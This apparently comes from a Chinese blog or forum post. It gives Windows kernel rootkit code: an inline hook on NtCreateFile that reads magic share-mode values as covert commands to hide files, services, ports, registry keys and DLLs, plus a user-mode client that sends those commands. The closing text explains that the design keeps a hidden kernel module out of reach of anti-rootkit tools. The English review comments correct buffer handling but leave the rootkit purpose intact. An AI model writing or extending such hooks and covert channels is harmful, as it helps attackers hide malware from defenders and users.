ring0代碼:
/*
 * Magic values carried in NtCreateFile's ShareAccess argument. Any START_*
 * value turns the call into a command for the NewNtCreateFile hook below
 * instead of a real open. The ring3 client repeats the same table, so the
 * two copies must stay in sync. Values run consecutively in hex
 * (…4089, …4090, …4091 are adjacent hex numbers, not decimal gaps).
 */
#define NO_MSG 0x88882048   /* not referenced anywhere on this page */
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091
#define START_PARAKEY 0x88884092
#define START_DLLPATH 0x88884093
#define START_CLEARFILER 0x88884094
#define START_HOOKIOCREATEFILE 0x88884095
#define START_HIDEDLL 0x88884096
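VOID DispatchIoctl(ULONG IRPcode,WCHAR *buf,ULONG uInSize)
{
    /*
     * Command handler for the covert channel. NewNtCreateFile calls this
     * with:
     *   IRPcode - the START_* value that was smuggled in ShareAccess
     *   buf     - the request's ObjectName copied into a kernel stack buffer
     *   uInSize - wcslen(buf), i.e. the command length in WCHARs, not bytes
     *
     * The body is intentionally empty on this page ("put your code here").
     *
     * NOTE(review): buf originates from whatever string a user-mode process
     * passed to CreateFile, so anything implemented here must treat it as
     * untrusted input (no trusting uInSize beyond the buffer, no format
     * strings, no unchecked parsing).
     */
    (void)IRPcode;  /* parameters are unused until a handler is written */
    (void)buf;
    (void)uInSize;
}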
#pragma LOCKEDCODE
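NTSTATUS NewNtCreateFile(OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength)
{
    /*
     * Replacement body installed over NtCreateFile by an inline hook.
     *
     * Two jobs:
     *  1. Covert command channel: when ShareAccess is one of the START_*
     *     magic values the request is a command from the ring3 client, not a
     *     real open. The object name is copied into a stack buffer and handed
     *     to DispatchIoctl(); the request is NOT forwarded to the original.
     *  2. Otherwise the call is passed through to the original NtCreateFile
     *     (via NtCreateFileHookZone) and its status is returned unchanged.
     *
     * Returns: the original function's NTSTATUS on pass-through. Command
     * requests get an error status (the value of STATUS_INVALID_PARAMETER),
     * because *FileHandle and *IoStatusBlock are never written on that path;
     * the original returned FALSE (== STATUS_SUCCESS) there and so handed the
     * caller "success" together with an uninitialised handle.
     *
     * Security notes (review):
     *  - The command path is reachable from any user-mode process (the ring3
     *    client is a plain CreateFile with a START_* dwShareMode), so the
     *    ObjectName length is chosen by the caller. The copy into lpwCommand
     *    is bounded here; the original memcpy'd ObjectName->Length unchecked
     *    into a 200-byte stack buffer, and zeroed only the first 100 bytes.
     *    UNICODE_STRING.Length is in bytes, not WCHARs.
     *  - ObjectAttributes / ObjectName / Buffer are NULL-checked, but they
     *    are very likely user-mode pointers on this path and nothing on this
     *    page probes them (ProbeForRead / exception guard, PreviousMode) —
     *    TODO confirm before relying on this in a driver.
     */
    WCHAR lpwCommand[100];
    NTSTATUS status;
    BOOL isCommand = FALSE;
    /* Same numeric value as STATUS_INVALID_PARAMETER in ntstatus.h. */
    const NTSTATUS rejected = (NTSTATUS)0xC000000DL;

    switch (ShareAccess)
    {
    case START_PROTECT:
    case START_HIDEFILE:
    case START_HIDEKEY:
    case START_HIDESERVICES:
    case START_HIDEPORT:
    case START_PARAKEY:
    case START_DLLPATH:
    case START_CLEARFILER:
    case START_CHECKHOOK:
    case START_HOOKIOCREATEFILE:
    case START_HIDEDLL:
        isCommand = TRUE;
        break;
    default:
        /* Ordinary share mode: a real open, forwarded below. */
        break;
    }

    if (isCommand)
    {
        ULONG nameBytes;

        if (ObjectAttributes == NULL
            || ObjectAttributes->ObjectName == NULL
            || ObjectAttributes->ObjectName->Buffer == NULL)
        {
            return rejected;
        }

        /* Length counts bytes. Keep one WCHAR free so the buffer stays
         * NUL-terminated for the wcslen() below (the zero fill supplies it). */
        nameBytes = ObjectAttributes->ObjectName->Length;
        if (nameBytes > sizeof(lpwCommand) - sizeof(WCHAR))
        {
            return rejected;
        }

        RtlZeroMemory(lpwCommand, sizeof(lpwCommand));
        memcpy(lpwCommand, ObjectAttributes->ObjectName->Buffer, nameBytes);
        /* Hand the command to the driver-side dispatcher; size is in WCHARs. */
        DispatchIoctl(ShareAccess, lpwCommand, (ULONG)wcslen(lpwCommand));
        return rejected;
    }

    /* NtCreateFileHookZone is presumably the relocated original prologue
     * plus a jump back into NtCreateFile, prepared by the hook installer
     * elsewhere in the driver; it is re-assigned on every call as the
     * original did. */
    OldNtCreateFile = (NtCreateFile)NtCreateFileHookZone;
    status = OldNtCreateFile(FileHandle,
                             DesiredAccess,
                             ObjectAttributes,
                             IoStatusBlock,
                             AllocationSize,
                             FileAttributes,
                             ShareAccess,
                             CreateDisposition,
                             CreateOptions,
                             EaBuffer,
                             EaLength);
    return status;
}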
////////////////////////////////////////////
ring3代碼就很簡單了:
#include <windows.h>
#include <stdio.h>
/*
 * Ring3 copy of the command table. These values are passed as CreateFile's
 * dwShareMode and must match the driver-side definitions byte for byte, or
 * the hooked NtCreateFile will treat the call as an ordinary open.
 */
#define NO_MSG 0x88882048   /* not referenced anywhere on this page */
#define START_PROTECT 0x88884086
#define START_HIDEFILE 0x88884087
#define START_HIDESERVICES 0x88884088
#define START_HIDEPORT 0x88884089
#define START_HIDEKEY 0x88884090
#define START_CHECKHOOK 0x88884091
#define START_PARAKEY 0x88884092
#define START_DLLPATH 0x88884093
#define START_CLEARFILER 0x88884094
#define START_HOOKIOCREATEFILE 0x88884095
#define START_HIDEDLL 0x88884096
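int main(int argc, char *argv[])
{
    /*
     * User-mode side of the covert channel. argv[1] is the payload (the
     * "file name"), and START_HIDEFILE is smuggled in CreateFile's
     * dwShareMode; the hooked NtCreateFile recognises that value, copies the
     * name for DispatchIoctl and does not open a real file.
     *
     * Exit status: 0 after sending the command, 1 on a usage error. The
     * original returned TRUE (1) on the success path and 0 on the usage
     * path, which is backwards for a shell.
     *
     * The returned handle is deliberately not closed: with the driver loaded
     * the hook on this page never writes *FileHandle, so hFile is
     * indeterminate, and without the driver the magic share mode reaches the
     * real NtCreateFile, which presumably rejects it (verify). Note also
     * that OPEN_ALWAYS would create argv[1] if the open ever went through.
     */
    HANDLE hFile;

    if (argc != 2)
    {
        printf("used:%s lpk.dll\r\n", argv[0]);
        return 1;
    }

    hFile = CreateFile(argv[1], GENERIC_READ, START_HIDEFILE, NULL, OPEN_ALWAYS,
                       FILE_ATTRIBUTE_NORMAL, NULL);
    (void)hFile;  /* see note above: not a usable handle either way */
    return 0;
}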
這樣就不需要註冊 Device，在隱藏內核模塊的時候比較方便；不需要通信的時候恢復 inline hook，免得被 ARK 工具掃出來。(In English: this avoids registering a device object, which is convenient while the kernel module itself is hidden; when no communication is needed the inline hook is restored so ARK tools do not flag it. Caveat: the channel is reachable from any process that calls CreateFile with one of the START_* share-mode values, so the hook must bound the copy of ObjectName into its stack buffer and validate the user-mode pointers it dereferences, otherwise an unprivileged caller can crash or overflow the kernel.)
還有很多函數可以用,仁者見仁智者見智了~~